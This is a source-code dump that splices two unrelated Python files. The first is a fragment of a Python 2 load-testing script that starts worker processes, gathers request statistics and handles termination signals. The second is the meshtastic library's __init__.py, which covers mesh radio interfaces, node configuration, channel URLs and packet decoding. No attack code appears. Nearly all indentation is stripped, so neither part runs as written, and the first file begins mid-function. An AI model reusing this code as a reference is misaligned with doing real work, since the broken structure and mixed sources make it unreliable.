n = datetime.datetime.now()
print 'Now it\'s %2d:\033[1;32;40m%2d\033[0m:%2d, please input to change the minute' % (
n.hour, n.minute, n.second),
print '(Press \'Enter\' or wait 30 sec to run, \'q\' to exit): ',
try:
input_data = {'data': 'default'}
t = threading.Thread(target=input_func, args=(input_data,))
t.daemon = True
t.start()
                t.join(30)  # wait 30 seconds
if input_data['data'] == 'q':
sys.exit()
elif '' == input_data['data'] or 'default' == input_data['data']:
break
try:
input_data['data'] = int(input_data['data'])
except ValueError:
print '[ERROR] I only receive numbers (*>﹏<*)'
continue
n = datetime.datetime.now()
diff = input_data['data'] * 60 - (n.minute * 60 + n.second)
if diff > 0:
print 'Wait for %d seconds...' % diff
time.sleep(diff)
break
else:
break
except KeyboardInterrupt:
print '\nSystem exit...'
sys.exit()
n = datetime.datetime.now()
msg = 'Start at %s, pid:%d. Press Ctr+C to stop. Screen Refresh Interval: 3 sec' % (
time.strftime('%X %x %Z'), os.getpid())
print msg
logging.info(msg)
    # valid_start_time: the moment all workers have started.
    # valid_end_time: the moment the first worker exits.
    # current_threads: the number of workers currently running. -2 means manual exit, -1 means normal exit.
valid_start_time = multiprocessing.Value('d', float(sys.maxint))
valid_end_time = multiprocessing.Value('d', float(sys.maxint))
current_threads = multiprocessing.Value('i', 0)
    # results_queue: queue for saving request records, shared by all processes.
results_queue = multiprocessing.Queue(0)
    # Start the result-statistics process. It pulls request records from the queue, saves them locally and refreshes the live results.
results_writer = results.ResultWriter(CONFIG, TESTCASES[CONFIG['Testcase']].split(';')[0].split(';')[0],
results_queue, get_total_requests(),
valid_start_time, valid_end_time, current_threads)
results_writer.daemon = True
results_writer.name = 'resultsWriter'
results_writer.start()
print 'resultWriter started, pid: %d' % results_writer.pid
    # Raise the priority of this process
os.system('renice -19 -p ' + str(results_writer.pid) + ' >/dev/null 2>&1')
time.sleep(.2)
    # Start the worker processes one by one
process_list = []
    # Lock shared by all processes
lock = multiprocessing.Lock()
esc = chr(27) # escape key
i = 0
while i < CONFIG['Threads']:
p = multiprocessing.Process(target=start_process, args=(
i, USERS[i / CONFIG['ThreadsPerUser']], CONFIG['Testcase'], results_queue, valid_start_time, valid_end_time,
current_threads,
lock, None,
False))
i += 1
p.daemon = True
p.name = 'worker-%d' % i
p.start()
        # Raise each worker process's priority by 1
os.system('renice -1 -p ' + str(p.pid) + ' >/dev/null 2>&1')
process_list.append(p)
logging.info('All %d threads started, valid_start_time: %.3f' % (len(process_list), valid_start_time.value))
    # Forced exit handler (exit before all requests finish)
def exit_force(signal_num, e):
msg = "\n\n\033[5;33;40m[WARN]Terminate Signal %d Received. Terminating... please wait\033[0m" % signal_num
logging.warn('%r' % msg)
print msg, '\nWaiting for all the threads exit....'
lock.acquire()
current_threads.value = -2
lock.release()
time.sleep(.1)
tmpi = 0
for j in process_list:
if j.is_alive():
if tmpi >= 100:
logging.info('force to terminate process %s' % j.name)
j.terminate()
else:
time.sleep(.1)
tmpi += 1
break
print "\033[1;32;40mWorkers exited.\033[0m Waiting results_writer exit...",
sys.stdout.flush()
while results_writer.is_alive():
current_threads.value = -2
tmpi += 1
if tmpi > 1000:
logging.warn('retry too many time, shutdown results_writer using terminate()')
results_writer.terminate()
time.sleep(.01)
print "\n\033[1;33;40m[WARN] Terminated\033[0m\n"
print version
sys.exit()
import signal
signal.signal(signal.SIGINT, exit_force)
signal.signal(signal.SIGTERM, exit_force)
time.sleep(1)
    # Normal exit
stop_mark = False
while not stop_mark:
time.sleep(.3)
if CONFIG['RunSeconds'] and (time.time() - valid_start_time.value >= CONFIG['RunSeconds']):
logging.info('time is up, exit')
exit_force(99, None)
for j in process_list:
if j.is_alive():
break
stop_mark = True
for j in process_list:
j.join()
    # Wait for the result process to exit.
logging.info('Waiting results_writer to exit...')
while results_writer.is_alive():
current_threads.value = -1 # inform results_writer
time.sleep(.3)
print "\n\033[1;33;40m[WARN] Terminated after all requests\033[0m\n"
print version
|
__init__.py
|
"""
# an API for Meshtastic devices
Primary class: SerialInterface
Install with pip: "[pip3 install meshtastic](https://pypi.org/project/meshtastic/)"
Source code on [github](https://github.com/meshtastic/Meshtastic-python)
properties of SerialInterface:
- radioConfig - Current radio configuration and device settings, if you write to this the new settings will be applied to
the device.
- nodes - The database of received nodes. Includes always up-to-date location and username information for each
node in the mesh. This is a read-only datastructure.
- nodesByNum - like "nodes" but keyed by nodeNum instead of nodeId
- myInfo - Contains read-only information about the local radio device (software version, hardware version, etc)
# Published PubSub topics
We use a [publish-subscribe](https://pypubsub.readthedocs.io/en/v4.0.3/) model to communicate asynchronous events. Available
topics:
- meshtastic.connection.established - published once we've successfully connected to the radio and downloaded the node DB
- meshtastic.connection.lost - published once we've lost our link to the radio
- meshtastic.receive.text(packet) - delivers a received packet as a dictionary; if you only care about a particular
type of packet, subscribe to the full topic name. If you want to see all packets, simply subscribe to "meshtastic.receive".
- meshtastic.receive.position(packet)
- meshtastic.receive.user(packet)
- meshtastic.receive.data.portnum(packet) (where portnum is an integer or well known PortNum enum)
- meshtastic.node.updated(node = NodeInfo) - published when a node in the DB changes (appears, location changed, username changed, etc...)
We receive position, user, or data packets from the mesh. You probably only care about meshtastic.receive.data. The first argument for
that publish will be the packet. Text or binary data packets (from sendData or sendText) will both arrive this way. If you print packet
you'll see the fields in the dictionary. decoded.payload will contain the raw bytes that were sent. If the packet was sent with
sendText, decoded.text will **also** be populated with the decoded string. For ASCII these two strings will be the same, but for
unicode scripts they can be different.
# Example Usage
```
import meshtastic
from pubsub import pub
def onReceive(packet, interface): # called when a packet arrives
print(f"Received: {packet}")
def onConnection(interface, topic=pub.AUTO_TOPIC): # called when we (re)connect to the radio
# defaults to broadcast, specify a destination ID if you wish
interface.sendText("hello mesh")
pub.subscribe(onReceive, "meshtastic.receive")
pub.subscribe(onConnection, "meshtastic.connection.established")
# By default will try to find a meshtastic device, otherwise provide a device path like /dev/ttyUSB0
interface = meshtastic.SerialInterface()
```
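A second, narrower example (a minimal sketch): if you only care about text messages, subscribe to
that specific topic; in this version of the library the decoded text is available under
packet['decoded']['text'].
```
def onText(packet, interface): # called only for received text messages
    print(f"Got text: {packet['decoded']['text']}")

pub.subscribe(onText, "meshtastic.receive.text")
```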
"""
import pygatt
import google.protobuf.json_format
import serial
import threading
import logging
import sys
import random
import traceback
import time
import base64
import platform
import socket
from . import mesh_pb2, portnums_pb2, apponly_pb2, admin_pb2, environmental_measurement_pb2, remote_hardware_pb2, channel_pb2, radioconfig_pb2, util
from .util import fixme, catchAndIgnore, stripnl, DeferredExecution
from pubsub import pub
from dotmap import DotMap
from typing import *
from google.protobuf.json_format import MessageToJson
START1 = 0x94
START2 = 0xc3
HEADER_LEN = 4
MAX_TO_FROM_RADIO_SIZE = 512
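# On the stream transports each ToRadio/FromRadio protobuf is framed on the wire as
# START1, START2, <length high byte>, <length low byte>, <protobuf bytes>, where the payload
# length may not exceed MAX_TO_FROM_RADIO_SIZE (see StreamInterface._sendToRadioImpl and __reader below).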
defaultHopLimit = 3
"""A special ID that means broadcast"""
BROADCAST_ADDR = "^all"
"""A special ID that means the local node"""
LOCAL_ADDR = "^local"
# if using 8 bit nodenums this will be shortened on the target
BROADCAST_NUM = 0xffffffff
"""The numeric buildnumber (shared with android apps) specifying the level of device code we are guaranteed to understand
format is Mmmss (where M is 1 + the numeric major number), i.e. 20120 means 1.1.20
"""
OUR_APP_VERSION = 20200
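# Worked example of the Mmmss rule: OUR_APP_VERSION = 20200 means major 2-1=1, minor 02, patch 00,
# i.e. we are guaranteed to understand device code level 1.2.0. The helper below is only an
# illustrative sketch (it is not part of the published meshtastic API):
def _decodeAppVersion(buildnumber):
    """Illustrative only: unpack an Mmmss build number into a readable version string."""
    major, rest = divmod(buildnumber, 10000)
    minor, patch = divmod(rest, 100)
    return "%d.%d.%d" % (major - 1, minor, patch)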
publishingThread = DeferredExecution("publishing")
class ResponseHandler(NamedTuple):
"""A pending response callback, waiting for a response to one of our messages"""
# requestId: int - used only as a key
callback: Callable
# FIXME, add timestamp and age out old requests
class KnownProtocol(NamedTuple):
"""Used to automatically decode known protocol payloads"""
name: str
# portnum: int, now a key
    # If set, will be called to parse as a protocol buffer
protobufFactory: Callable = None
# If set, invoked as onReceive(interface, packet)
onReceive: Callable = None
def waitForSet(target, sleep=.1, maxsecs=20, attrs=()):
"""Block until the specified attributes are set. Returns True if config has been received."""
for _ in range(int(maxsecs/sleep)):
if all(map(lambda a: getattr(target, a, None), attrs)):
return True
time.sleep(sleep)
return False
class Node:
"""A model of a (local or remote) node in the mesh
Includes methods for radioConfig and channels
"""
def __init__(self, iface, nodeNum):
"""Constructor"""
self.iface = iface
self.nodeNum = nodeNum
self.radioConfig = None
self.channels = None
def showInfo(self):
"""Show human readable description of our node"""
print(self.radioConfig)
print("Channels:")
for c in self.channels:
if c.role != channel_pb2.Channel.Role.DISABLED:
cStr = MessageToJson(c.settings).replace("\n", "")
print(f" {channel_pb2.Channel.Role.Name(c.role)} {cStr}")
print(f"\nChannel URL {self.channelURL}")
def requestConfig(self):
"""
Send regular MeshPackets to ask for settings and channels
"""
self.radioConfig = None
self.channels = None
self.partialChannels = [] # We keep our channels in a temp array until finished
self._requestSettings()
def waitForConfig(self, maxsecs=20):
"""Block until radio config is received. Returns True if config has been received."""
return waitForSet(self, attrs=('radioConfig', 'channels'), maxsecs=maxsecs)
def writeConfig(self):
"""Write the current (edited) radioConfig to the device"""
if self.radioConfig == None:
raise Exception("No RadioConfig has been read")
p = admin_pb2.AdminMessage()
p.set_radio.CopyFrom(self.radioConfig)
self._sendAdmin(p)
logging.debug("Wrote config")
def writeChannel(self, channelIndex):
"""Write the current (edited) channel to the device"""
p = admin_pb2.AdminMessage()
p.set_channel.CopyFrom(self.channels[channelIndex])
self._sendAdmin(p)
logging.debug("Wrote channel {channelIndex}")
def getChannelByName(self, name):
"""Try to find the named channel or return None"""
for c in (self.channels or []):
if c.settings and c.settings.name == name:
return c
return None
def getDisabledChannel(self):
"""Return the first channel that is disabled (i.e. available for some new use)"""
for c in self.channels:
if c.role == channel_pb2.Channel.Role.DISABLED:
return c
return None
def _getAdminChannelIndex(self):
"""Return the channel number of the admin channel, or 0 if no reserved channel"""
c = self.getChannelByName("admin")
if c:
return c.index
else:
return 0
def setOwner(self, long_name, short_name=None):
"""Set device owner name"""
nChars = 3
minChars = 2
if long_name is not None:
long_name = long_name.strip()
if short_name is None:
words = long_name.split()
if len(long_name) <= nChars:
short_name = long_name
elif len(words) >= minChars:
short_name = ''.join(map(lambda word: word[0], words))
else:
trans = str.maketrans(dict.fromkeys('aeiouAEIOU'))
short_name = long_name[0] + long_name[1:].translate(trans)
if len(short_name) < nChars:
short_name = long_name[:nChars]
p = admin_pb2.AdminMessage()
if long_name is not None:
p.set_owner.long_name = long_name
if short_name is not None:
short_name = short_name.strip()
if len(short_name) > nChars:
short_name = short_name[:nChars]
p.set_owner.short_name = short_name
return self._sendAdmin(p)
@property
def channelURL(self):
"""The sharable URL that describes the current channel
"""
# Only keep the primary/secondary channels, assume primary is first
channelSet = apponly_pb2.ChannelSet()
for c in self.channels:
if c.role != channel_pb2.Channel.Role.DISABLED:
channelSet.settings.append(c.settings)
bytes = channelSet.SerializeToString()
s = base64.urlsafe_b64encode(bytes).decode('ascii')
return f"https://www.meshtastic.org/d/#{s}".replace("=", "")
def setURL(self, url):
"""Set mesh network URL"""
if self.radioConfig == None:
raise Exception("No RadioConfig has been read")
# URLs are of the form https://www.meshtastic.org/d/#{base64_channel_set}
# Split on '/#' to find the base64 encoded channel settings
splitURL = url.split("/#")
b64 = splitURL[-1]
# We normally strip padding to make for a shorter URL, but the python parser doesn't like
# that. So add back any missing padding
# per https://stackoverflow.com/a/9807138
missing_padding = len(b64) % 4
if missing_padding:
b64 += '=' * (4 - missing_padding)
decodedURL = base64.urlsafe_b64decode(b64)
channelSet = apponly_pb2.ChannelSet()
channelSet.ParseFromString(decodedURL)
i = 0
for chs in channelSet.settings:
ch = channel_pb2.Channel()
ch.role = channel_pb2.Channel.Role.PRIMARY if i == 0 else channel_pb2.Channel.Role.SECONDARY
ch.index = i
ch.settings.CopyFrom(chs)
self.channels[ch.index] = ch
self.writeChannel(ch.index)
i = i + 1
def _requestSettings(self):
"""
Done with initial config messages, now send regular MeshPackets to ask for settings
"""
p = admin_pb2.AdminMessage()
p.get_radio_request = True
def onResponse(p):
"""A closure to handle the response packet"""
self.radioConfig = p["decoded"]["admin"]["raw"].get_radio_response
logging.debug("Received radio config, now fetching channels...")
self._requestChannel(0) # now start fetching channels
return self._sendAdmin(p,
wantResponse=True,
onResponse=onResponse)
def _requestChannel(self, channelNum: int):
"""
Done with initial config messages, now send regular MeshPackets to ask for settings
"""
p = admin_pb2.AdminMessage()
p.get_channel_request = channelNum + 1
logging.debug(f"Requesting channel {channelNum}")
def onResponse(p):
"""A closure to handle the response packet"""
c = p["decoded"]["admin"]["raw"].get_channel_response
self.partialChannels.append(c)
logging.debug(f"Received channel {stripnl(c)}")
index = c.index
# for stress testing, we can always download all channels
fastChannelDownload = True
# Once we see a response that has NO settings, assume we are at the end of channels and stop fetching
quitEarly = (
c.role == channel_pb2.Channel.Role.DISABLED) and fastChannelDownload
if quitEarly or index >= self.iface.myInfo.max_channels - 1:
logging.debug("Finished downloading channels")
# Fill the rest of array with DISABLED channels
index += 1
while index < self.iface.myInfo.max_channels:
ch = channel_pb2.Channel()
ch.role = channel_pb2.Channel.Role.DISABLED
ch.index = index
self.partialChannels.append(ch)
index += 1
self.channels = self.partialChannels
# FIXME, the following should only be called after we have settings and channels
                self.iface._connected()  # Tell everyone else we are ready to go
else:
self._requestChannel(index + 1)
return self._sendAdmin(p,
wantResponse=True,
onResponse=onResponse)
def _sendAdmin(self, p: admin_pb2.AdminMessage, wantResponse=False,
onResponse=None):
"""Send an admin message to the specified node (or the local node if destNodeNum is zero)"""
return self.iface.sendData(p, self.nodeNum,
portNum=portnums_pb2.PortNum.ADMIN_APP,
wantAck=True,
wantResponse=wantResponse,
onResponse=onResponse,
channelIndex=self.iface.localNode._getAdminChannelIndex())
class MeshInterface:
"""Interface class for meshtastic devices
Properties:
isConnected
nodes
debugOut
"""
def __init__(self, debugOut=None, noProto=False):
"""Constructor
Keyword Arguments:
noProto -- If True, don't try to run our protocol on the link - just be a dumb serial client.
"""
self.debugOut = debugOut
self.nodes = None # FIXME
self.isConnected = threading.Event()
self.noProto = noProto
self.localNode = Node(self, -1) # We fixup nodenum later
self.myInfo = None # We don't have device info yet
self.responseHandlers = {} # A map from request ID to the handler
self.failure = None # If we've encountered a fatal exception it will be kept here
random.seed() # FIXME, we should not clobber the random seedval here, instead tell user they must call it
self.currentPacketId = random.randint(0, 0xffffffff)
self._startConfig()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
if exc_type is not None and exc_value is not None:
logging.error(
f'An exception of type {exc_type} with value {exc_value} has occurred')
if traceback is not None:
logging.error(f'Traceback: {traceback}')
self.close()
def showInfo(self):
"""Show human readable summary about this object"""
print(self.myInfo)
print("Nodes in mesh:")
for n in self.nodes.values():
print(stripnl(n))
def getNode(self, nodeId):
"""Return a node object which contains device settings and channel info"""
if nodeId == LOCAL_ADDR:
return self.localNode
else:
logging.info("Requesting configuration from remote node (this could take a while)")
n = Node(self, nodeId)
n.requestConfig()
if not n.waitForConfig(maxsecs = 60):
raise Exception("Timed out waiting for node config")
return n
def sendText(self, text: AnyStr,
destinationId=BROADCAST_ADDR,
wantAck=False,
wantResponse=False,
hopLimit=defaultHopLimit,
onResponse=None):
"""Send a utf8 string to some other node, if the node has a display it will also be shown on the device.
Arguments:
text {string} -- The text to send
Keyword Arguments:
destinationId {nodeId or nodeNum} -- where to send this message (default: {BROADCAST_ADDR})
portNum -- the application portnum (similar to IP port numbers) of the destination, see portnums.proto for a list
wantAck -- True if you want the message sent in a reliable manner (with retries and ack/nak provided for delivery)
wantResponse -- True if you want the service on the other side to send an application layer response
Returns the sent packet. The id field will be populated in this packet and can be used to track future message acks/naks.
"""
return self.sendData(text.encode("utf-8"), destinationId,
portNum=portnums_pb2.PortNum.TEXT_MESSAGE_APP,
wantAck=wantAck,
wantResponse=wantResponse,
hopLimit=hopLimit,
onResponse=onResponse)
def sendData(self, data, destinationId=BROADCAST_ADDR,
portNum=portnums_pb2.PortNum.PRIVATE_APP, wantAck=False,
wantResponse=False,
hopLimit=defaultHopLimit,
onResponse=None,
channelIndex=0):
"""Send a data packet to some other node
Keyword Arguments:
data -- the data to send, either as an array of bytes or as a protobuf (which will be automatically serialized to bytes)
destinationId {nodeId or nodeNum} -- where to send this message (default: {BROADCAST_ADDR})
portNum -- the application portnum (similar to IP port numbers) of the destination, see portnums.proto for a list
wantAck -- True if you want the message sent in a reliable manner (with retries and ack/nak provided for delivery)
wantResponse -- True if you want the service on the other side to send an application layer response
onResponse -- A closure of the form funct(packet), that will be called when a response packet arrives (or the transaction is NAKed due to non receipt)
Returns the sent packet. The id field will be populated in this packet and can be used to track future message acks/naks.
"""
if getattr(data, "SerializeToString", None):
logging.debug(f"Serializing protobuf as data: {stripnl(data)}")
data = data.SerializeToString()
if len(data) > mesh_pb2.Constants.DATA_PAYLOAD_LEN:
raise Exception("Data payload too big")
if portNum == portnums_pb2.PortNum.UNKNOWN_APP: # we are now more strict wrt port numbers
raise Exception("A non-zero port number must be specified")
meshPacket = mesh_pb2.MeshPacket()
meshPacket.channel = channelIndex
meshPacket.decoded.payload = data
meshPacket.decoded.portnum = portNum
meshPacket.decoded.want_response = wantResponse
p = self._sendPacket(meshPacket, destinationId,
wantAck=wantAck, hopLimit=hopLimit)
if onResponse is not None:
self._addResponseHandler(p.id, onResponse)
return p
def sendPosition(self, latitude=0.0, longitude=0.0, altitude=0, timeSec=0, destinationId=BROADCAST_ADDR, wantAck=False, wantResponse=False):
"""
Send a position packet to some other node (normally a broadcast)
Also, the device software will notice this packet and use it to automatically set its notion of
the local position.
If timeSec is not specified (recommended), we will use the local machine time.
Returns the sent packet. The id field will be populated in this packet and can be used to track future message acks/naks.
"""
p = mesh_pb2.Position()
if(latitude != 0.0):
p.latitude_i = int(latitude / 1e-7)
if(longitude != 0.0):
p.longitude_i = int(longitude / 1e-7)
if(altitude != 0):
p.altitude = int(altitude)
if timeSec == 0:
timeSec = time.time() # returns unix timestamp in seconds
p.time = int(timeSec)
return self.sendData(p, destinationId,
portNum=portnums_pb2.PortNum.POSITION_APP,
wantAck=wantAck,
wantResponse=wantResponse)
def _addResponseHandler(self, requestId, callback):
self.responseHandlers[requestId] = ResponseHandler(callback)
def _sendPacket(self, meshPacket,
destinationId=BROADCAST_ADDR,
wantAck=False, hopLimit=defaultHopLimit):
"""Send a MeshPacket to the specified node (or if unspecified, broadcast).
You probably don't want this - use sendData instead.
Returns the sent packet. The id field will be populated in this packet and
can be used to track future message acks/naks.
"""
# We allow users to talk to the local node before we've completed the full connection flow...
if(self.myInfo is not None and destinationId != self.myInfo.my_node_num):
self._waitConnected()
toRadio = mesh_pb2.ToRadio()
if destinationId is None:
raise Exception("destinationId must not be None")
elif isinstance(destinationId, int):
nodeNum = destinationId
elif destinationId == BROADCAST_ADDR:
nodeNum = BROADCAST_NUM
elif destinationId == LOCAL_ADDR:
nodeNum = self.myInfo.my_node_num
elif destinationId.startswith("!"): # A simple hex style nodeid - we can parse this without needing the DB
nodeNum = int(destinationId[1:], 16)
else:
node = self.nodes.get(destinationId)
if not node:
raise Exception(f"NodeId {destinationId} not found in DB")
nodeNum = node['num']
meshPacket.to = nodeNum
meshPacket.want_ack = wantAck
meshPacket.hop_limit = hopLimit
# if the user hasn't set an ID for this packet (likely and recommended), we should pick a new unique ID
# so the message can be tracked.
if meshPacket.id == 0:
meshPacket.id = self._generatePacketId()
toRadio.packet.CopyFrom(meshPacket)
#logging.debug(f"Sending packet: {stripnl(meshPacket)}")
self._sendToRadio(toRadio)
return meshPacket
def waitForConfig(self):
"""Block until radio config is received. Returns True if config has been received."""
success = waitForSet(self, attrs=('myInfo', 'nodes')) and self.localNode.waitForConfig()
if not success:
raise Exception("Timed out waiting for interface config")
def getMyNodeInfo(self):
if self.myInfo is None:
return None
return self.nodesByNum.get(self.myInfo.my_node_num)
def getMyUser(self):
nodeInfo = self.getMyNodeInfo()
if nodeInfo is not None:
return nodeInfo.get('user')
return None
def getLongName(self):
user = self.getMyUser()
if user is not None:
return user.get('longName', None)
return None
def getShortName(self):
user = self.getMyUser()
if user is not None:
return user.get('shortName', None)
return None
def _waitConnected(self):
"""Block until the initial node db download is complete, or timeout
and raise an exception"""
if not self.isConnected.wait(5.0): # timeout after 5 seconds
raise Exception("Timed out waiting for connection completion")
# If we failed while connecting, raise the connection to the client
if self.failure:
raise self.failure
def _generatePacketId(self):
"""Get a new unique packet ID"""
if self.currentPacketId is None:
raise Exception("Not connected yet, can not generate packet")
else:
self.currentPacketId = (self.currentPacketId + 1) & 0xffffffff
return self.currentPacketId
def _disconnected(self):
"""Called by subclasses to tell clients this interface has disconnected"""
self.isConnected.clear()
publishingThread.queueWork(lambda: pub.sendMessage(
"meshtastic.connection.lost", interface=self))
def _connected(self):
"""Called by this class to tell clients we are now fully connected to a node
"""
# (because I'm lazy) _connected might be called when remote Node
# objects complete their config reads, don't generate redundant isConnected
# for the local interface
if not self.isConnected.is_set():
self.isConnected.set()
publishingThread.queueWork(lambda: pub.sendMessage(
"meshtastic.connection.established", interface=self))
def _startConfig(self):
"""Start device packets flowing"""
self.myInfo = None
self.nodes = {} # nodes keyed by ID
self.nodesByNum = {} # nodes keyed by nodenum
startConfig = mesh_pb2.ToRadio()
self.configId = random.randint(0, 0xffffffff)
startConfig.want_config_id = self.configId
self._sendToRadio(startConfig)
def _sendToRadio(self, toRadio):
"""Send a ToRadio protobuf to the device"""
if self.noProto:
logging.warn(
f"Not sending packet because protocol use is disabled by noProto")
else:
#logging.debug(f"Sending toRadio: {stripnl(toRadio)}")
self._sendToRadioImpl(toRadio)
def _sendToRadioImpl(self, toRadio):
"""Send a ToRadio protobuf to the device"""
logging.error(f"Subclass must provide toradio: {toRadio}")
def _handleConfigComplete(self):
"""
Done with initial config messages, now send regular MeshPackets to ask for settings and channels
"""
self.localNode.requestConfig()
def _handleFromRadio(self, fromRadioBytes):
"""
Handle a packet that arrived from the radio(update model and publish events)
Called by subclasses."""
fromRadio = mesh_pb2.FromRadio()
fromRadio.ParseFromString(fromRadioBytes)
asDict = google.protobuf.json_format.MessageToDict(fromRadio)
# logging.debug(f"Received from radio: {fromRadio}")
if fromRadio.HasField("my_info"):
self.myInfo = fromRadio.my_info
self.localNode.nodeNum = self.myInfo.my_node_num
logging.debug(f"Received myinfo: {stripnl(fromRadio.my_info)}")
failmsg = None
# Check for app too old
if self.myInfo.min_app_version > OUR_APP_VERSION:
failmsg = "This device needs a newer python client, please \"pip install --upgrade meshtastic\". For more information see https://tinyurl.com/5bjsxu32"
# check for firmware too old
if self.myInfo.max_channels == 0:
failmsg = "This version of meshtastic-python requires device firmware version 1.2 or later. For more information see https://tinyurl.com/5bjsxu32"
if failmsg:
self.failure = Exception(failmsg)
self.isConnected.set() # let waitConnected return this exception
self.close()
elif fromRadio.HasField("node_info"):
node = asDict["nodeInfo"]
try:
self._fixupPosition(node["position"])
except:
logging.debug("Node without position")
logging.debug(f"Received nodeinfo: {node}")
self.nodesByNum[node["num"]] = node
if "user" in node: # Some nodes might not have user/ids assigned yet
self.nodes[node["user"]["id"]] = node
publishingThread.queueWork(lambda: pub.sendMessage("meshtastic.node.updated",
node=node, interface=self))
elif fromRadio.config_complete_id == self.configId:
            # config_complete_id matches the id we sent in _startConfig, so the initial node DB download is done
logging.debug(f"Config complete ID {self.configId}")
self._handleConfigComplete()
elif fromRadio.HasField("packet"):
self._handlePacketFromRadio(fromRadio.packet)
elif fromRadio.rebooted:
# Tell clients the device went away. Careful not to call the overridden subclass version that closes the serial port
MeshInterface._disconnected(self)
self._startConfig() # redownload the node db etc...
else:
logging.debug("Unexpected FromRadio payload")
def _fixupPosition(self, position):
"""Convert integer lat/lon into floats
Arguments:
            position {Position dictionary} -- object to fix up
"""
if "latitudeI" in position:
position["latitude"] = position["latitudeI"] * 1e-7
if "longitudeI" in position:
position["longitude"] = position["longitudeI"] * 1e-7
def _nodeNumToId(self, num):
"""Map a node node number to a node ID
Arguments:
num {int} -- Node number
Returns:
string -- Node ID
"""
if num == BROADCAST_NUM:
return BROADCAST_ADDR
try:
return self.nodesByNum[num]["user"]["id"]
except:
logging.debug(f"Node {num} not found for fromId")
return None
def _getOrCreateByNum(self, nodeNum):
"""Given a nodenum find the NodeInfo in the DB (or create if necessary)"""
if nodeNum == BROADCAST_NUM:
raise Exception("Can not create/find nodenum by the broadcast num")
if nodeNum in self.nodesByNum:
return self.nodesByNum[nodeNum]
else:
n = {"num": nodeNum} # Create a minimial node db entry
self.nodesByNum[nodeNum] = n
return n
def _handlePacketFromRadio(self, meshPacket):
"""Handle a MeshPacket that just arrived from the radio
Will publish one of the following events:
- meshtastic.receive.text(packet = MeshPacket dictionary)
- meshtastic.receive.position(packet = MeshPacket dictionary)
- meshtastic.receive.user(packet = MeshPacket dictionary)
- meshtastic.receive.data(packet = MeshPacket dictionary)
"""
asDict = google.protobuf.json_format.MessageToDict(meshPacket)
# We normally decompose the payload into a dictionary so that the client
# doesn't need to understand protobufs. But advanced clients might
# want the raw protobuf, so we provide it in "raw"
asDict["raw"] = meshPacket
# from might be missing if the nodenum was zero.
if not "from" in asDict:
asDict["from"] = 0
logging.error(
f"Device returned a packet we sent, ignoring: {stripnl(asDict)}")
return
if not "to" in asDict:
asDict["to"] = 0
        # add fromId and toId fields based on the node ID
try:
asDict["fromId"] = self._nodeNumToId(asDict["from"])
except Exception as ex:
logging.warn(f"Not populating fromId {ex}")
try:
asDict["toId"] = self._nodeNumToId(asDict["to"])
except Exception as ex:
logging.warn(f"Not populating toId {ex}")
# We could provide our objects as DotMaps - which work with . notation or as dictionaries
# asObj = DotMap(asDict)
topic = "meshtastic.receive" # Generic unknown packet type
decoded = asDict["decoded"]
# The default MessageToDict converts byte arrays into base64 strings.
# We don't want that - it messes up data payload. So slam in the correct
# byte array.
decoded["payload"] = meshPacket.decoded.payload
# UNKNOWN_APP is the default protobuf portnum value, and therefore if not set it will not be populated at all
# to make API usage easier, set it to prevent confusion
if not "portnum" in decoded:
decoded["portnum"] = portnums_pb2.PortNum.Name(
portnums_pb2.PortNum.UNKNOWN_APP)
portnum = decoded["portnum"]
topic = f"meshtastic.receive.data.{portnum}"
# decode position protobufs and update nodedb, provide decoded version as "position" in the published msg
# move the following into a 'decoders' API that clients could register?
portNumInt = meshPacket.decoded.portnum # we want portnum as an int
handler = protocols.get(portNumInt)
# The decoded protobuf as a dictionary (if we understand this message)
p = None
if handler is not None:
topic = f"meshtastic.receive.{handler.name}"
# Convert to protobuf if possible
if handler.protobufFactory is not None:
pb = handler.protobufFactory()
pb.ParseFromString(meshPacket.decoded.payload)
p = google.protobuf.json_format.MessageToDict(pb)
asDict["decoded"][handler.name] = p
# Also provide the protobuf raw
asDict["decoded"][handler.name]["raw"] = pb
# Call specialized onReceive if necessary
if handler.onReceive is not None:
handler.onReceive(self, asDict)
# Is this message in response to a request, if so, look for a handler
requestId = decoded.get("requestId")
if requestId is not None:
# We ignore ACK packets, but send NAKs and data responses to the handlers
routing = decoded.get("routing")
isAck = routing is not None and ("errorReason" not in routing)
if not isAck:
# we keep the responseHandler in dict until we get a non ack
handler = self.responseHandlers.pop(requestId, None)
if handler is not None:
handler.callback(asDict)
logging.debug(f"Publishing {topic}: packet={stripnl(asDict)} ")
publishingThread.queueWork(lambda: pub.sendMessage(
topic, packet=asDict, interface=self))
# Our standard BLE characteristics
TORADIO_UUID = "f75c76d2-129e-4dad-a1dd-7866124401e7"
FROMRADIO_UUID = "8ba2bcc2-ee02-4a55-a531-c525c5e454d5"
FROMNUM_UUID = "ed9da18c-a800-4f66-a670-aa7547e34453"
class BLEInterface(MeshInterface):
"""A not quite ready - FIXME - BLE interface to devices"""
def __init__(self, address, debugOut=None):
self.address = address
self.adapter = pygatt.GATTToolBackend() # BGAPIBackend()
self.adapter.start()
logging.debug(f"Connecting to {self.address}")
self.device = self.adapter.connect(address)
logging.debug("Connected to device")
# fromradio = self.device.char_read(FROMRADIO_UUID)
MeshInterface.__init__(self, debugOut=debugOut)
self._readFromRadio() # read the initial responses
def handle_data(handle, data):
self._handleFromRadio(data)
self.device.subscribe(FROMNUM_UUID, callback=handle_data)
def _sendToRadioImpl(self, toRadio):
"""Send a ToRadio protobuf to the device"""
# logging.debug(f"Sending: {stripnl(toRadio)}")
b = toRadio.SerializeToString()
self.device.char_write(TORADIO_UUID, b)
def close(self):
self.adapter.stop()
def _readFromRadio(self):
wasEmpty = False
while not wasEmpty:
b = self.device.char_read(FROMRADIO_UUID)
wasEmpty = len(b) == 0
if not wasEmpty:
self._handleFromRadio(b)
class StreamInterface(MeshInterface):
"""Interface class for meshtastic devices over a stream link (serial, TCP, etc)"""
def __init__(self, debugOut=None, noProto=False, connectNow=True):
"""Constructor, opens a connection to self.stream
Keyword Arguments:
devPath {string} -- A filepath to a device, i.e. /dev/ttyUSB0 (default: {None})
debugOut {stream} -- If a stream is provided, any debug serial output from the device will be emitted to that stream. (default: {None})
Raises:
Exception: [description]
Exception: [description]
"""
if not hasattr(self, 'stream'):
raise Exception(
"StreamInterface is now abstract (to update existing code create SerialInterface instead)")
self._rxBuf = bytes() # empty
self._wantExit = False
# FIXME, figure out why daemon=True causes reader thread to exit too early
self._rxThread = threading.Thread(target=self.__reader, args=())
MeshInterface.__init__(self, debugOut=debugOut, noProto=noProto)
# Start the reader thread after superclass constructor completes init
if connectNow:
self.connect()
